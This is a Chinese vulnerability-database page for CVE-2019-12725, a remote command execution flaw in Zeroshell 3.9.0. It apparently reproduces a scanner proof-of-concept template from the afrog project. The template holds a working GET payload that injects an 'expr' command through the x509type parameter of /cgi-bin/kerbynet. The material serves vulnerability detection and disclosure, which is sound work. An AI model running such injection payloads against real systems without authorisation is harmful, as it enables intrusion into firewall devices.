CVE-2019-12725: Zeroshell 3.9.0 Remote Command Execution

日期: 2025-09-01 | 影响软件: Zeroshell | POC: 已公开

漏洞描述

ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令 app="Zeroshell-防火墙"

PoC代码[已公开]

id: CVE-2019-12725

info:
    name: Zeroshell 3.9.0 Remote Command Execution
    author: YekkoY
    severity: high
    description: |
        ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令
        app="Zeroshell-防火墙"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.html
        

set:
    r1: randomInt(800000000, 1000000000)
    r2: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            method: GET
            path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2019/CVE-2019-12725.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2009-0545: ZeroShell <= 1.0beta11 Remote Code Execution POC

CVE-2019-12725: Zeroshell 3.9.0 - Remote Command Execution POC

CVE-2020-29390: Zeroshell 3.9.3 - Command Injection POC

CVE-2019-0193: Apache Solr Remote Code Execution POC

CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution S2-059 POC